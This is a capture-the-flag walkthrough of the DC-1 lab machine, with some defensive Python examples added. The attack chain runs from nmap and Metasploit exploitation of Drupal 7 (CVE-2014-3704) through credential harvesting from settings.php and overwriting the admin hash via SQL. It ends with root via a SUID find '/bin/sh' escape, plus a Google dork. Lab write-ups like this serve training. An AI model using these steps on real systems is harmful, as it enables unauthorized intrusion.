Host discovery
We use netdiscover to find the hosts on the local network, then use Nmap to probe the ports of 192.168.234.176:
```
nmap -Pn -A 192.168.234.176 --script=vuln
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-05 08:45 CST
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 192.168.234.176
Host is up (0.00040s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
80/tcp  open  http    Apache httpd 2.2.22 ((Debian))
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.234.176
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.234.176:80/
| Form id: user-login-form
| Form action: /node?destination=node
|
| Path: http://192.168.234.176:80/node?destination=node
| Form id: user-login-form
| Form action: /node?destination=node
|
| Path: http://192.168.234.176:80/user/password
| Form id: user-pass
| Form action: /user/password
|
| Path: http://192.168.234.176:80/user/register
| Form id: user-register-form
| Form action: /user/register
|
| Path: http://192.168.234.176:80/user/
| Form id: user-login
| Form action: /user/
|
| Path: http://192.168.234.176:80/user
| Form id: user-login
|_ Form action: /user
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /rss.xml: RSS or Atom feed
| /robots.txt: Robots file
| /UPGRADE.txt: Drupal file
| /INSTALL.txt: Drupal file
| /INSTALL.mysql.txt: Drupal file
| /INSTALL.pgsql.txt: Drupal file
| /: Drupal version 7
| /README: Interesting, a readme.
| /README.txt: Interesting, a readme.
| /0/: Potentially interesting folder
|_ /user/: Potentially interesting folder
|_http-server-header: Apache/2.2.22 (Debian)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-vuln-cve2014-3704:
| VULNERABLE:
| Drupal - pre Auth SQL Injection Vulnerability
| State: VULNERABLE (Exploitable)
| IDs: CVE:CVE-2014-3704
| The expandArguments function in the database abstraction API in
| Drupal core 7.x before 7.32 does not properly construct prepared
| statements, which allows remote attackers to conduct SQL injection
| attacks via an array containing crafted keys.
|
| Disclosure date: 2014-10-15
| References:
| https://www.drupal.org/SA-CORE-2014-005
| http://www.securityfocus.com/bid/70595
| https://www.sektioneins.de/en/advisories/advisory-012014-drupal-pre-auth-sql-injection-vulnerability.html
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3704
| vulners:
| cpe:/a:apache:http_server:2.2.22:
| CVE-2017-7679 7.5 https://vulners.com/cve/CVE-2017-7679
| CVE-2017-7668 7.5 https://vulners.com/cve/CVE-2017-7668
| CVE-2017-3169 7.5 https://vulners.com/cve/CVE-2017-3169
| CVE-2017-3167 7.5 https://vulners.com/cve/CVE-2017-3167
| CVE-2013-2249 7.5 https://vulners.com/cve/CVE-2013-2249
| CVE-2018-1312 6.8 https://vulners.com/cve/CVE-2018-1312
| CVE-2013-1862 5.1 https://vulners.com/cve/CVE-2013-1862
| CVE-2014-0231 5.0 https://vulners.com/cve/CVE-2014-0231
| CVE-2014-0098 5.0 https://vulners.com/cve/CVE-2014-0098
| CVE-2013-6438 5.0 https://vulners.com/cve/CVE-2013-6438
| CVE-2013-5704 5.0 https://vulners.com/cve/CVE-2013-5704
| CVE-2016-4975 4.3 https://vulners.com/cve/CVE-2016-4975
| CVE-2013-1896 4.3 https://vulners.com/cve/CVE-2013-1896
| CVE-2012-4558 4.3 https://vulners.com/cve/CVE-2012-4558
| CVE-2012-3499 4.3 https://vulners.com/cve/CVE-2012-3499
| CVE-2016-8612 3.3 https://vulners.com/cve/CVE-2016-8612
|_ CVE-2012-2687 2.6 https://vulners.com/cve/CVE-2012-2687
111/tcp open  rpcbind 2-4 (RPC #100000)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 36232/udp status
| 100024 1 44155/tcp status
| 100024 1 44611/udp6 status
|_ 100024 1 53919/tcp6 status
MAC Address: 00:0C:29:BD:B2:2E (VMware)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2 - 3.16
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.40 ms 192.168.234.176

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 239.82 seconds
```
During the scan we used Nmap's vuln script category, which checks the target for common, known vulnerabilities. From the results, the machine has port 80 open and serves a site built on the Drupal CMS, Drupal version 7, for which a large number of vulnerabilities are reported.
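A scan like the one above mixes two kinds of findings that deserve different treatment: the http-vuln-cve2014-3704 check actually tested the target and reported `State: VULNERABLE`, whereas the long vulners list is only matched against the Apache version banner and is unverified. The following Python is an added example (not part of the original write-up) that parses Nmap's normal output into that distinction and orders the findings for follow-up. `SAMPLE` is a constructed excerpt shaped like the scan output above, not the full page output.

```python
import re

# Constructed excerpt in the shape of `nmap -sV --script=vuln` normal output
# (modelled on the scan above, not the page's full output).
SAMPLE = """\
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
80/tcp  open  http    Apache httpd 2.2.22 ((Debian))
| http-vuln-cve2014-3704:
|   VULNERABLE:
|   Drupal - pre Auth SQL Injection Vulnerability
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2014-3704
|     Disclosure date: 2014-10-15
| vulners:
|   cpe:/a:apache:http_server:2.2.22:
|     \tCVE-2017-7679\t7.5\thttps://vulners.com/cve/CVE-2017-7679
|_    \tCVE-2012-2687\t2.6\thttps://vulners.com/cve/CVE-2012-2687
111/tcp open  rpcbind 2-4 (RPC #100000)
"""

PORT_RE = re.compile(r'^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$')
CVE_RE = re.compile(r'CVE-\d{4}-\d+')
# vulners prints "<id> <cvss> <url>" per candidate; only CVE ids are kept here
VULNERS_RE = re.compile(r'(CVE-\d{4}-\d+)\s+(\d+\.\d)\s+https?://\S+')


def parse_nmap(text):
    """Return one dict per port line, with the script findings that followed it.

    'confirmed' holds CVEs a check script reported as State: VULNERABLE;
    'candidate' maps CVEs that vulners matched purely on the version banner
    to their CVSS score (unverified, so they are kept separate).
    """
    ports, current, pending = [], None, False
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            current = {
                'port': int(m.group(1)), 'proto': m.group(2), 'state': m.group(3),
                'service': m.group(4), 'version': m.group(5).strip(),
                'confirmed': [], 'candidate': {},
            }
            ports.append(current)
            pending = False
            continue
        if current is None or not line.startswith('|'):
            continue  # header, host banner, traceroute etc.
        if 'State: VULNERABLE' in line:
            pending = True  # the next IDs: line belongs to this finding
        elif pending and 'IDs:' in line:
            current['confirmed'].extend(CVE_RE.findall(line))
            pending = False
        else:
            v = VULNERS_RE.search(line)
            if v:
                current['candidate'][v.group(1)] = float(v.group(2))
    return ports


def triage(ports, min_score=7.0):
    """Order findings for follow-up: script-confirmed first, then high-CVSS banner matches."""
    out = []
    for p in ports:
        for cve in p['confirmed']:
            out.append((p['port'], cve, 'confirmed by script'))
        for cve, score in sorted(p['candidate'].items(), key=lambda kv: -kv[1]):
            if score >= min_score:
                out.append((p['port'], cve, f'version match, CVSS {score}'))
    return out


if __name__ == '__main__':
    for port, cve, reason in triage(parse_nmap(SAMPLE)):
        print(f'{port:>5}  {cve:<16} {reason}')
```

For anything beyond a quick look, run Nmap with `-oX` and parse the XML instead; the normal output format is not a stable interface, and the regexes here are tuned to the vulns library's layout shown above.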
A couple of side notes
Google dorking with the query inurl:"q=user/password" turns up large numbers of Drupal sites. To quickly determine the Drupal version in a real engagement, look in robots.txt for the MAINTAINERS.txt entry; that file leaks the version number.
Vulnerability discovery
In Kali we use searchsploit to look up exploitable Drupal vulnerabilities.
searchsploit is a command-line search tool for Exploit-DB that also lets you carry a copy of Exploit-DB with you. It lets you run detailed offline searches against a locally saved repository, which is especially useful for security assessments of networks with no Internet access. Many exploits include links to binaries that are not part of the standard repository but can be found in the Exploit-DB binaries collection.
```
searchsploit Drupal
```
Exploitation
Several of the vulnerabilities in the searchsploit results can be exploited with msf. Open msf and search for the exploit:
```
use 4
info
```
info shows the exploit's details; our target site falls within the affected range.
```
set rhosts 192.168.234.176
```
sets the target machine's IP.
```
exploit
```
runs the exploit. The target checks in; exploitation succeeded.
A few things to watch when configuring the exploit: web services are usually hosted on port 80, so the module fills in port 80 by default. If the web service is on port 888 rather than 80, set the port to 888. As for targeturi, if the CMS is installed under the /abc directory, set targeturi to /abc.
Finding the flags
Flag1
Run ls and find flag1:
```
cat flag1.txt
Every good CMS needs a config file – and so do you.
```
So we are told to look for the web application's config file; obvious enough.
Flag2
cat web.config turned up nothing. Then it dawned on me that this means the CMS's config file. After some searching, the file to look for turned out to be settings.php under www/sites/default.
flag2:
Brute force and dictionary attacks aren't the only ways to gain access (and you WILL need access). What can you do with these credentials?
Below flag2 in settings.php are the MySQL username and password, so we can try logging in to MySQL to get accounts and passwords.
Flag3
Use python -c '__import__("pty").spawn("/bin/bash")' to get an interactive shell, then log in to MySQL:
```
mysql -u dbuser -p
```
Querying the database:
```
show databases;
```
lists all current databases.
```
use drupaldb
```
switches to that database.
```
show tables;
```
lists its tables. The table we care about most is users, so we go straight to it.
flag2 hinted that cracking is not the only way in. Here we can change admin's password directly with UPDATE, but since the stored password is a hash rather than plaintext, we also need the script that produces those hashes.
Use quit to leave mysql.
The hashing script was eventually found in the scripts directory under the web root:
```
www-data@DC-1:/var/www/scripts$ ls
ls
code-clean.sh dump-database-d6.sh generate-d7-content.sh test.script
cron-curl.sh dump-database-d7.sh password-hash.sh
cron-lynx.sh drupal.sh generate-d6-content.sh run-tests.sh
www-data@DC-1:/var/www/scripts$ ./password-hash.sh
./password-hash.sh
Generate Drupal password hashes from the shell.
Usage: password-hash.sh [OPTIONS] "<plan-text password>"
Example: password-hash.sh "mynewpassword"
All arguments are long options.
--help Print this page.
--root <path>
Set the working directory for the script to the specified path.
To execute this script this has to be the root directory of your
Drupal installation, e.g. /home/www/foo/drupal (assuming Drupal
running on Unix). Use surrounding quotation marks on Windows.
"<password1>" ["<password2>" ["<password3>" ...]]
One or more plan-text passwords enclosed by double quotes. The
output hash may be manually entered into the {users}.pass field to
change a password via SQL to a known value.
To run this script without the --root argument invoke it from the root directory
of your Drupal installation as
./scripts/password-hash.sh
```
I hit a small snag here: no matter how I ran it, hashing failed. The usage text explains it: unless the script is given the --root path, it has to be invoked from the root directory of the Drupal installation:
```
./scripts/password-hash.sh "admin"
```
which gives $S$D9vVemNX8fwUjNNOyw/ZcvWaPH7LeE5FNO.cf5EjDKqCzref/wA2
Updating the administrator password
Back in mysql:
```
update users set pass='$S$D9vVemNX8fwUjNNOyw/ZcvWaPH7LeE5FNO.cf5EjDKqCzref/wA2' where uid=1;
```
Log in to the admin account with the new password and find flag3.
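It helps to understand what password-hash.sh produced: a `$S$` tag, one character encoding the iteration count (`D` here, i.e. 2^15 rounds), an 8-character salt (`9vVemNX8`) and a base64-style encoding of an iterated SHA-512, truncated to 55 characters. That is why a freshly generated hash can simply be written into users.pass, and also how a defender can verify, offline, whether a hash from a backup still corresponds to an expected credential. The Python below is an added example, written for this page and not code from the page or from Drupal itself; it reimplements the `$S$` scheme of Drupal 7's password.inc as I understand it, and the `PAGE_HASH` constant is the value quoted above.

```python
import hashlib
import hmac
import os

ITOA64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
HASH_LENGTH = 55                 # stored hashes are truncated to this length
MIN_LOG2, MAX_LOG2 = 7, 30       # allowed range of the iteration-count exponent
DEFAULT_LOG2 = 15                # Drupal 7 default: 2**15 = 32768 rounds

# The hash the walkthrough obtained from password-hash.sh (quoted from the page).
PAGE_HASH = '$S$D9vVemNX8fwUjNNOyw/ZcvWaPH7LeE5FNO.cf5EjDKqCzref/wA2'


def _b64(data):
    """phpass-style base64: little-endian 6-bit groups over the ITOA64 alphabet."""
    out, i, n = [], 0, len(data)
    while i < n:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3f])
        if i < n:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3f])
        if i >= n:
            break
        i += 1
        if i < n:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3f])
        if i >= n:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3f])
    return ''.join(out)


def parse_hash(stored):
    """Split a $S$ hash into its fields: algorithm tag, round count and salt."""
    if len(stored) < 12 or stored[0] != '$' or stored[2] != '$':
        raise ValueError('not a Drupal-style hash')
    return {'algo': stored[1], 'iterations': 1 << ITOA64.index(stored[3]), 'salt': stored[4:12]}


def _crypt(password, setting):
    """Core of Drupal 7's _password_crypt() for sha512; returns None on a malformed setting."""
    setting = setting[:12]
    if len(setting) < 12 or setting[0] != '$' or setting[2] != '$':
        return None
    count_log2 = ITOA64.find(setting[3])
    if not MIN_LOG2 <= count_log2 <= MAX_LOG2:
        return None
    pw = password.encode('utf-8')
    digest = hashlib.sha512(setting[4:12].encode('ascii') + pw).digest()
    for _ in range(1 << count_log2):          # iterated to slow down offline guessing
        digest = hashlib.sha512(digest + pw).digest()
    return (setting + _b64(digest))[:HASH_LENGTH]


def hash_password(password, count_log2=DEFAULT_LOG2, salt_bytes=None):
    """Produce a fresh $S$ hash; salt_bytes (6 bytes) may be fixed for reproducible tests."""
    count_log2 = max(MIN_LOG2, min(MAX_LOG2, count_log2))
    raw = (salt_bytes if salt_bytes is not None else os.urandom(6))[:6]
    return _crypt(password, '$S$' + ITOA64[count_log2] + _b64(raw))


def check_password(password, stored):
    """True if password matches a stored $S$ hash (legacy $U$/md5 forms are not handled)."""
    if not stored.startswith('$S$'):
        return False
    computed = _crypt(password, stored)
    return computed is not None and hmac.compare_digest(computed, stored)


if __name__ == '__main__':
    print(parse_hash(PAGE_HASH))
    fresh = hash_password('admin')
    print(fresh, check_password('admin', fresh), check_password('wrong', fresh))
```

Running `check_password('admin', PAGE_HASH)` reproduces the check Drupal performs at login; the same function, looped over a dump of the users table, is a cheap way to confirm that uid=1 still carries the hash you expect after an incident like the one this write-up describes.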
Flag4
Found by accident while poking around with the hash script; ordinarily /etc/passwd would also point you to it. It sits under the /home directory and hints that we need to escalate privileges before we can get flag5.
Flag5
Following the hint in flag3, use find -exec. First search for programs with the SUID bit set:
```
find / -user root -perm -4000 -print 2>/dev/null
find / -type f -perm -u=s 2>/dev/null
```
It turns out that find itself is SUID root:
```
find ./ -exec "whoami" \;
```
runs whoami as root, and
```
find ./ -exec "/bin/sh" \;
```
gives a root shell. We now have root; the box is done.
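Seen from the defender's side, the two find commands above are the start of a SUID audit: any setuid-root file that is not in the distribution's expected set (here, find) is a privilege-escalation path and should be stripped of the bit or removed. The Python below is an added example, not code from the page or from any tool it mentions: it walks a tree the way `find / -perm -4000 -type f` does, keeps only regular files with the setuid bit, and reports those whose name is not on an allowlist. `BASELINE` is a constructed, deliberately partial list for the demo; in practice generate it from a known-good host of the same distribution and version, and `demo()` builds a throwaway directory with a few fake binaries so the audit can run offline.

```python
import os
import shutil
import stat
import tempfile

# Constructed, deliberately partial allowlist of binaries that are setuid on a typical
# Debian install. In practice, generate the baseline from a known-good host instead.
BASELINE = {'passwd', 'su', 'sudo', 'mount', 'umount', 'chsh', 'chfn',
            'gpasswd', 'newgrp', 'ping', 'pkexec'}


def find_suid(root, owner_uid=None):
    """Paths of regular files under root with the setuid bit set.

    Mirrors `find / -perm -4000 -type f`; pass owner_uid=0 for the `-user root` form.
    Unreadable directories are skipped rather than aborting the walk.
    """
    hits = []
    for dirpath, _dirs, files in os.walk(root, onerror=lambda err: None):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: do not follow symlinks
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode) or not st.st_mode & stat.S_ISUID:
                continue
            if owner_uid is not None and st.st_uid != owner_uid:
                continue
            hits.append(path)
    return sorted(hits)


def audit_suid(paths, baseline=BASELINE):
    """Return the setuid files whose basename is not in the expected set."""
    return [p for p in paths if os.path.basename(p) not in baseline]


def demo():
    """Build a throwaway tree with a few fake binaries and audit it (constructed input)."""
    root = tempfile.mkdtemp(prefix='suid-audit-')
    try:
        for name, mode in (('passwd', 0o4755), ('su', 0o4755), ('ls', 0o755), ('find', 0o4755)):
            path = os.path.join(root, name)
            with open(path, 'w') as fh:
                fh.write('#!/bin/sh\n')   # placeholder content; only the mode matters
            os.chmod(path, mode)
        return [os.path.basename(p) for p in audit_suid(find_suid(root))]
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == '__main__':
    unexpected = audit_suid(find_suid('/', owner_uid=0))
    print('\n'.join(unexpected) or 'no unexpected setuid-root files')
```

Matching on basename alone is enough to catch the `find` case from this box, but a copy of a legitimate name in an odd directory would slip through; comparing full paths and package-manager ownership (dpkg -S, rpm -qf) against the baseline closes that gap.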
Another way to get Flag3
In the searchsploit results we also found the following.
We can use this script to add another administrator account and then view flag3:
```
python 34992.py -t http://192.168.234.176/ -u admin123 -p admin123
```